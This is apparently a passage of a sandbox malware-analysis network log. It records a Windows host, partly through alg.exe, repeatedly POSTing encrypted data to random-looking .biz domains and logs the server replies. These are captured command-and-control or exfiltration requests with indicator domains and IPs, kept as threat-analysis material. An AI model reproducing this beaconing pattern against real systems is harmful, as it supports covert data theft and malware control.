User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:22.507111073 CET | 834 | OUT | Data Raw: 60 69 25 df 94 b7 b9 e4 36 03 00 00 05 9f 8f 52 34 53 27 04 37 2d 1e a1 c0 c3 27 9c 58 92 5c 13 6a 72 ce 31 bd c8 cb 73 a9 cb 8b 5c 34 52 41 d1 41 54 69 b6 d3 0e 88 4a ea 28 b7 9c 08 d8 b6 7b ad ad 0a 9f cd 80 f6 ae 82 9d b2 d2 23 c8 77 d4 45 73
Data Ascii: `i%6R4S'7-'X\jr1s\4RAATiJ({#wEs%]d/I6DHfNT\44RhP>@#Kk4?&"MoH%"2T{dx?}j1KG/TDvmY^! -^%;.KBPOB~uvd
Nov 18, 2024 09:59:23.170321941 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7db8344854959a83f326b8dfee12d846|155.94.241.187|1731920363|1731920363|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.10 | 50086 | 47.129.31.212 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:23.170159101 CET | 360 | OUT | POST /jcpwgygctjgsvho HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rrqafepng.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:23.170159101 CET | 778 | OUT | Data Raw: cd 7b 84 22 4a 35 fa 0d fe 02 00 00 67 39 99 62 6f bc e5 5b 93 64 14 8f de a9 e4 6c d9 a4 72 0d 29 ef d2 42 d7 48 f5 d3 3a 5f c6 93 ca 4d 6b 56 0a 35 9f 78 3d 4b 84 ec d4 fc 3e 22 89 a1 0b 43 6a 93 6b 0a 87 85 96 df 1a cf a0 0e e0 45 1d fa 27 5b
Data Ascii: {"J5g9bo[dlr)BH:_MkV5x=K>"CjkE'[u>[f4uxseOg*N}&adI#Vj; f{X8|gU5rC<!dpBAmKq<u-$Pb4=+kI6z<a`DI$|+.[oTRi]?-}NrZ


Session ID | Source IP | Source Port | Destination IP | Destination Port
108 | 192.168.2.10 | 50087 | 13.251.16.150 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:23.192809105 CET | 346 | OUT | POST /wwge HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:23.192809105 CET | 834 | OUT | Data Raw: 58 8a d5 fd 5e e2 ce 52 36 03 00 00 6f 39 1c 22 30 da 3b 49 91 ab ba 2d 00 2f 2d d7 fd 78 a9 a6 b4 2e 00 30 b0 34 fe 3b 15 e9 67 58 6f 78 88 c9 10 ba b4 41 22 6c 89 84 80 d1 c2 a5 4a f2 33 1f e7 a0 ed 51 2b 52 36 4c b8 2b e6 26 69 a4 64 88 b0 5e
Data Ascii: X^R6o9"0;I-/-x.04;gXoxA"lJ3Q+R6L+&id^c8N:FII5'&,2R7KM/OwN')_Nr5mE7lVr"\[e-U6xK~:WQcq7\fZ'{u='a4=
Nov 18, 2024 09:59:24.636329889 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8f1e5e2a5b9d500419cb6d22eefa61cd|155.94.241.187|1731920364|1731920364|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.10 | 50088 | 47.129.31.212 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:23.520540953 CET | 359 | OUT | POST /ohxhiftljchuvp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rrqafepng.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:23.520540953 CET | 778 | OUT | Data Raw: ad d8 96 0b 4f 90 d5 5c fe 02 00 00 4b 4b 25 22 a8 b7 49 cf 9c b4 34 b5 82 f7 93 2b 13 73 ab 62 c5 5b 3d b2 48 e2 2f 05 6b b4 6e be 73 fc 05 82 4a 83 07 e4 af 36 8d 5e fe 60 57 de 26 2a 7b 1f 7b 27 76 00 56 5b ca 51 13 47 60 ee 1f 1d 71 b8 62 b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: O\KK%"I4+sb[=H/knsJ6^`W&*{{'vV[QG`qbce.M LH7n<x"N?qcO_{v\dylxL)V}uiDMwl,.88[m\`B!Y5O64-PM*vE<xAahW,B
Nov 18, 2024 09:59:24.980665922 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9490219c04560af5c787928e9676e5ec|155.94.241.187|1731920364|1731920364|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
110 | 192.168.2.10 | 50089 | 13.251.16.150 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:24.659861088 CET | 347 | OUT | POST /fp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:24.659893990 CET | 834 | OUT | Data Raw: e1 25 f6 18 a2 25 65 bf 36 03 00 00 ba 15 cc 74 96 41 20 b8 80 84 92 22 f3 39 04 31 01 21 c7 52 a5 5a 28 cf 31 cb 11 36 be 7d 94 69 87 b3 d0 59 92 60 2e 16 c7 18 31 74 04 fe de 9b 1f 73 f7 5f 7c 6b 14 5a eb 3a 58 14 1a 8e 13 a4 80 d1 fd 25 00 ec
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: %%e6tA "91!RZ(16}iY`.1ts_|kZ:X%=]:9,{ZA8UW36O6aUL0?^#zVJxP+yZ _t<<5E'_*1d36mj&$lF(/i#_eiLt4UV
Nov 18, 2024 09:59:26.102804899 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fc1b0a967f867a7bd8a9b78bbf63b461|155.94.241.187|1731920365|1731920365|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.10 | 50090 | 3.94.10.34 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:25.379667044 CET | 356 | OUT | POST /exuicwnpaqmh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ctdtgwag.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:25.379697084 CET | 778 | OUT | Data Raw: c6 c7 65 d8 0f 68 4e f9 fe 02 00 00 9a 18 17 72 c3 22 bc 79 e8 fa f3 c8 bf eb f0 1f 29 01 79 a1 54 db 51 ff c6 19 25 49 3b 36 b0 71 d1 ae 56 63 6e 43 03 df 18 57 5d 42 a5 49 c5 2e 70 a5 6b 53 8a 22 55 7e e5 97 ce 86 3a 07 6f 4f d6 02 0f 4e 4a c8
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ehNr"y)yTQ%I;6qVcnCW]BI.pkS"U~:oONJ'ss55cB7J]z&QRoXA/poA'{$yR*I,'}hi7d('Rbu9]sov[oGtVw^pcbK3=oC9"T_pN$
Nov 18, 2024 09:59:26.048280954 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f282b1d75331bfb0b48460f480c9c1f6|155.94.241.187|1731920365|1731920365|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
112 | 192.168.2.10 | 50091 | 34.211.97.45 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:26.123914957 CET | 359 | OUT | POST /npuxmmvdoacshpp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:26.123929977 CET | 834 | OUT | Data Raw: 9e 86 9a 27 90 d3 84 39 36 03 00 00 f2 e9 16 7b 73 80 24 be b2 74 97 cc 91 e9 a3 7f 9e ce 3b ae 28 93 c8 33 db 84 c4 e6 72 87 a4 77 5e 45 e7 0c e3 28 db e6 72 10 d7 7e 23 4c da 7c f2 00 a1 ac f8 04 e3 a2 52 2e a9 54 bf 32 8b 15 e1 2a eb 26 4c 99
Nov 18, 2024 09:59:26.955321074 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8ed96945c854079ec42358e5e45bd579|155.94.241.187|1731920366|1731920366|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.10 | 50092 | 35.164.78.200 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:26.558059931 CET | 348 | OUT | POST /xxfg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:26.558084965 CET | 778 | OUT | Data Raw: 36 85 e5 88 47 47 fe 60 fe 02 00 00 95 c6 62 80 8c 6a 3e c4 ed 11 a0 9a 95 e8 01 04 2c f6 1e 9b 3b d7 33 59 3e a2 c7 28 6b 42 e1 a0 ef dd a1 69 ae 41 c4 5c a1 d5 be cd 7c c5 fd f6 0a b4 99 c3 b3 f4 3a 99 fc 35 23 a7 32 a3 90 d8 6e ff b0 d2 1f 1c
Nov 18, 2024 09:59:27.396711111 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=edd7bd838c2ca2a3c6a7d48f6cbf7044|155.94.241.187|1731920367|1731920367|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
114 | 192.168.2.10 | 50093 | 47.129.31.212 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:26.975003958 CET | 358 | OUT | POST /bhjwcsvylmqgrfwl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:26.975023985 CET | 834 | OUT | Data Raw: 93 77 45 da cc d8 3f d7 36 03 00 00 f8 32 05 ff 8d 16 46 63 ca ec 77 b5 c2 70 ba 37 b6 e6 d4 22 6d b2 04 2f 46 9d d8 0e d5 17 da 1b fa b2 25 2c 25 9c 77 c8 43 db ee 29 69 b0 1f 5e fa 43 ff ba d4 ef 7d 73 c7 57 62 d3 0f 78 0e 98 5d a3 bb 81 0e f2
Nov 18, 2024 09:59:28.450325012 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b128078700503dab1bd34149235a8cbd|155.94.241.187|1731920368|1731920368|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        115192.168.2.105009418.141.10.107807888C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:59:27.742353916 CET  355                OUT        POST /kmkkfixobdivq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:27.742393017 CET  778                OUT        Data Raw: a5 43 66 38 7e 26 ae c7 fe 02 00 00 29 df f2 78 44 c3 04 ad 1c 35 b4 a1 cf e3 7c 2e 2e 2b 6b 35 1a c5 31 f6 0b b7 52 6a 3f bf 54 eb 2f bd e1 49 36 d4 33 45 e8 b7 f0 01 5c aa ce 84 19 f9 9f a1 cc 5c 0b f6 73 f2 06 40 9f 2f 9a 37 3f 68 64 50 18 17
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Cf8~&)xD5|..+k51Rj?T/I63E\\s@/7?hdPTofL6\FP>416T@M3mr'4yN)oU"13\arK=Hc&U6?I^!bgZ6,_mmBPcYJQ0+F
Nov 18, 2024 09:59:29.193000078 CET  414                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5dca3e9a935dfb525e7c8a31dce656a3|155.94.241.187|1731920368|1731920368|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port
116         192.168.2.10  50095        13.251.16.150   80
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:59:28.468466043 CET  345                OUT        POST /fp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:28.468481064 CET  834                OUT        Data Raw: 81 a2 a4 df 18 9b bc cc 36 03 00 00 ef ad a4 7a 6c 6d a8 c4 45 e2 9e ae 30 64 2f 8a 57 a1 be 54 5c a7 70 4f b0 ad 93 df cc cb 7c 28 f3 30 ac 62 5f 44 0c 7b 4a 2f 16 c8 30 8b 65 b5 cb 70 3f 15 90 ab db 9b a5 47 ba 0a 67 95 01 69 cc e2 ad 66 02 69
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 6zlmE0d/WT\pO|(0b_D{J/0ep?GgifiFsCQdUqngDRmb#|PFQAv?Yj5:~u_8unwH`WsDm({\S__:[Mu?GoaD8Nn;Hh7GzF^x
Nov 18, 2024 09:59:29.910023928 CET  415                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=73727a84d1b81275c451ba5d21a009e6|155.94.241.187|1731920369|1731920369|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
117         192.168.2.10  50096        208.100.26.245  80                7888  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:59:29.379503965 CET  354                OUT        POST /wpngtwyaa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:29.379503965 CET  778                OUT        Data Raw: ab db 62 bc 4e 69 94 cb fe 02 00 00 e2 43 5b be 36 6d a2 f7 1a 25 91 38 c7 9c 1b 5f 75 0a e9 6c c1 38 ec e1 e9 02 94 cd bf 37 49 87 92 b6 5b 37 66 93 10 cf 4b a2 cb cb c6 64 7c a0 03 18 2d bf 3f 32 26 6b f0 d2 fc e7 12 eb a9 39 61 6a aa 81 85 ff
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bNiC[6m%8_ul87I[7fKd|-?2&k9ajS:_ks?8"K[ >S`HaDeFtece7X2g1kq<lS^sEgCXxDJD}(mO]-6?X+E-&5<])*>#MQ1Mw
Nov 18, 2024 09:59:30.024719954 CET  744                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:59:30.224678040 CET  348                OUT        POST /ijq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:30.224678040 CET | 778 | OUT | Data Raw: d6 aa 93 99 7a 6d 84 5d fe 02 00 00 d8 58 e2 ae 5d ab d6 f4 fd a9 e7 65 91 60 2d 2f d4 eb c1 ed 74 d1 d7 1b 62 9c c2 96 cf 10 96 94 fe 05 df 5a 47 ce be 09 a5 52 de 78 0c f7 b4 8d 59 89 02 f3 29 a0 b5 f7 13 b7 64 38 fa 30 47 45 a6 35 cc 8e d9 a9
Nov 18, 2024 09:59:30.371562958 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port
118 | 192.168.2.10 | 50097 | 34.211.97.45 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:29.986210108 CET | 350 | OUT | POST /aglvdwcnc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
